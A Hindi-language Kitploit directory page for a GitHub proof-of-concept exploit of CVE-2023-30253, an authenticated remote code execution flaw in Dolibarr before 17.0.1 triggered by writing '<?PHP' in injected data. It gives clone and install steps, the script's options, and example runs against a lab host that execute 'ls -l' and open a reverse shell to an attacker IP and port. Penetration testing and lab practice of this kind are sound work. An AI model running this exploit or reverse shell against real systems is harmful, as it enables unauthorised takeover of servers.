Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
cve-2023-30253 — Dolibarr 17.0.1 से पहले के संस्करण में एक प्रमाणित उपयोगकर्ता अपरकेस हेरफेर के माध्यम से रिमोट कोड निष्पादन कर सकता है: इंजेक्ट किए गए डेटा में <?php के बजाय <?PHP का उपयोग। | Kitploit
उपकरण/GitHubGitHub/rubikcuv5/cve-2023-30253
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरिमोट एक्सेस टूल
GitHubrubikcuv5/cve-2023-30253

cve-2023-30253

Dolibarr 17.0.1 से पहले के संस्करण में एक प्रमाणित उपयोगकर्ता अपरकेस हेरफेर के माध्यम से रिमोट कोड निष्पादन कर सकता है: इंजेक्ट किए गए डेटा में <?php के बजाय <?PHP का उपयोग।

रिपॉजिटरी देखें
72 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2023-30253

image

विवरण

Dolibarr 17.0.1 से पहले के संस्करण में, एक प्रमाणित उपयोगकर्ता अपरकेस हेरफेर के माध्यम से दूरस्थ कोड निष्पादन की अनुमति देता है: इंजेक्ट किए गए डेटा में <?PHP को <?php के बजाय उपयोग करना।

दस्तावेज़ीकरण

  • CVE-2023-30253
  • GitHub Advisory: GHSA-9wqr-5jp4-mjmh

सेटअप

root@kitploit:~
git clone https://github.com/Rubikcuv5/cve-2023-30253.git

pip3 install -r requirements.txt

python3 CVE-2023-30253.py -h

उपयोग

root@kitploit:~
usage: CVE-2023-30253.py [-h] [--url URL] [-u USER] [-p PASSWORD] (-c COMMAND | -r ip port)

Argument parser

options:
  -h, --help            show this help message and exit
  --url URL             URL of the website
  -u USER, --user USER  Username
  -p PASSWORD, --password PASSWORD
                        Password
  -c COMMAND, --command COMMAND
                        Command to execute
  -r ip port, --reverseshell ip port
                        Reverse shell IP and port

उदाहरण POC

एक कमांड निष्पादित करें

root@kitploit:~
python3 CVE-2023-30253.py --url http://crm.board.htb -u admin -p admin -c "ls -l"

image

रिवर्स शेल प्राप्त करना

root@kitploit:~
 python3 CVE-2023-30253.py --url http://crm.board.htb -u admin -p admin -r  10.10.14.17  4444

image

लेखक

  • Rubickcuv
टूल डाउनलोड करें